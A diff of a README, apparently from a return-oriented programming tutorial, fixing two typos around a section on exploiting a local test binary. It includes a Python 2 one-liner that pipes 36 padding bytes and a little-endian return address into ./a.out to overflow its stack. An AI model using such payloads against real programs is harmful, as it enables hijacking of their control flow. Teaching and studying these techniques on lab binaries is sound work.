cvanloo/rop/README.md

 Note that we had to convert the endianness to match that of our CPU.

-We use Python 2 because Python 3's makes it us very hard to output an ASCII string with invalid bytes.
+We use Python 2 because Python 3 makes it us very hard to output an ASCII string with invalid bytes.

-## Read, Set, Exploit!
+## Ready, Set, Exploit!

 ```sh
 python2 -c 'print("A" * 36 + "\xc0\x11\x40\x00\x00\x00\x00\x00")' | ./a.out